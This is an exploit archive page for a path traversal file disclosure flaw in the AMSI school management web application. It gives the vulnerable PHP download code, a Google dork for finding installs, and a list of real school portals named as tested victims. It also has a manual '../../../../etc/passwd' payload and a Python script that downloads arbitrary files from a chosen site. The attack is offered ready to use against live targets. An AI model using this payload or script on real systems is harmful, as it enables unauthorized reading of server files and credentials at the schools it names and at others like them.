exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AMSI 3.20.47 Build 37 File Disclosure

AMSI 3.20.47 Build 37 File Disclosure
Posted Dec 23, 2014
Authored by KnocKout

AMSI version 3.20.47 build 37 suffers from a remote file disclosure vulnerability.

tags | exploit, remote, info disclosure
SHA-256 | f69ebc7b1974f5a8b8e971bbe32b26e3c1df8cf063404748a6b26e1efc807e87

AMSI 3.20.47 Build 37 File Disclosure

Change Mirror Download
                .__        _____        _______                
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage : http://h4x0resec.blogspot.com
[~] Guzel Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork : inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
makes it possible to read all the files from the local base.
#######################################################

### Error Line in 'download.php' ##

..
$path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);
// $path = $_GET['file'];
header("Content-Description: File Transfer");
header("Content-Type: application/force-download");
//header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );

@readfile($path);
..
########################################################
Example and tested on;

http://portal.iconnect.ae/
http://demo.iconnect.ae/
http://barsha.almawakeb.sch.ae/
http://portal.naischool.ae/
http://portal.ias-dubai.ae/
http://portal.madarschool.ae/
http://portal.isas.sch.ae/
http://portal.alsanawbarschool.com/
http://fia.fischools.com/
http://portal.ajyal.sch.ae/
http://portal.arabunityschool.com/
http://alnashaa.sch.ae/
http://portal.aaess.com/

############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################

# Coded by b3mb4m

import random
import os
import urllib

class B3mB4m(object):
def example(self):
print """

How to use ?
Website: http://VICTIM.com
Path : /download.php?file=../../../../etc/passwd
"""

def exploit(self):
ask = raw_input("Website :")
uz = raw_input("Path : ")

#ask = "http://alnashaa.sch.ae"
#uz = "/download.php?file=../../../../etc/passwd"

uniq = str(random.randrange(1,1000+1))+".txt"
filee = ask+uz

try:
urllib.urlretrieve(filee, uniq);
print "\t\nDownload complate ! "
os.startfile(uniq)
except:
B3mB4m().example()


if __name__ == '__main__':
B3mB4m().exploit()


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close